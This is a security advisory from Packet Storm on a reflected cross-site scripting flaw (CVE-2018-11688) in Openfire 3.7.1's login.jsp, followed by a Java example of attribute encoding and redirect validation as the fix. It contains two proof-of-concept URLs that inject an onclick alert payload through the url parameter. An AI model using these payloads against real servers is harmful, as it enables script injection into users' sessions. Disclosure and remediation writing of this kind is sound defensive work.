Source: packetstorm | Author: Yavuz Atlas | ID: PACKETSTORM:148057
History: Jun 05, 2018 - 12:00 a.m.

Ignite Realtime Openfire 3.7.1 Cross Site Scripting

packetstormsecurity.com

EPSS: 0.77 (percentile: 98.3%)

`I. VULNERABILITY  
-------------------------  
Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting  
  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-11688  
  
  
III. VENDOR HOMEPAGE  
-------------------------  
https://www.igniterealtime.org/projects/openfire/  
  
  
IV. DESCRIPTION  
-------------------------  
The url parameter of login.jsp in Openfire Version 3.7.1 has a reflected  
cross-site scripting vulnerability. A successful exploit could allow an  
attacker to execute arbitrary script code in the context of the affected  
site and to access sensitive browser-based information.  
  
  
V. PROOF OF CONCEPT  
-------------------------  
http://domain.net:9090/login.jsp?url=a"onclick="alert(1)  
http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1)  
  
  
VI. REFERENCES  
-------------------------  
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688  
  
  
VII. CREDIT  
-------------------------  
Yavuz Atlas - @yavuzatlas_  
http://www.biznet.com.tr/biznet-guvenlik-duyurulari  
  
  
`
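
The proof of concept above works because a double quote in the url value ends an HTML attribute, so the remediation is attribute-context output encoding plus validation of the target. The Java sketch below is an added example, not Openfire's code or the advisory author's. It assumes login.jsp writes url into a double-quoted attribute and that url is a post-login redirect target; the class, method names, markup and fallback path are hypothetical.

```java
// Added example, not Openfire source: markup and names are assumptions.
public class LoginUrlEncoding {

    // Vulnerable pattern: the request parameter is concatenated into a
    // double-quoted attribute, so a '"' in the value ends the attribute.
    static String renderUnsafe(String url) {
        return "<input type=\"hidden\" name=\"url\" value=\"" + url + "\">";
    }

    // Encode the characters that can terminate an attribute value or open markup.
    static String escapeHtmlAttr(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Defence in depth (assumes url is a post-login redirect target):
    // accept only same-site paths, otherwise fall back to a fixed page.
    static String sanitizeTarget(String url) {
        boolean local = url != null && url.startsWith("/") && !url.startsWith("//")
                && url.indexOf('\\') < 0 && url.chars().noneMatch(Character::isISOControl);
        return local ? url : "/";
    }

    static String renderSafe(String url) {
        return "<input type=\"hidden\" name=\"url\" value=\""
                + escapeHtmlAttr(sanitizeTarget(url)) + "\">";
    }

    public static void main(String[] args) {
        // Constructed inputs: the advisory's decoded value and a benign local path.
        String[] samples = { "a\"onclick=\"alert(1)", "/page.jsp?a=1&b=\"x\"" };
        for (String s : samples) {
            System.out.println("unsafe: " + renderUnsafe(s));
            System.out.println("safe:   " + renderSafe(s));
        }
    }
}
```

Encoding alone closes the attribute breakout; the path check additionally stops the parameter from being used to send users to another site after login.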
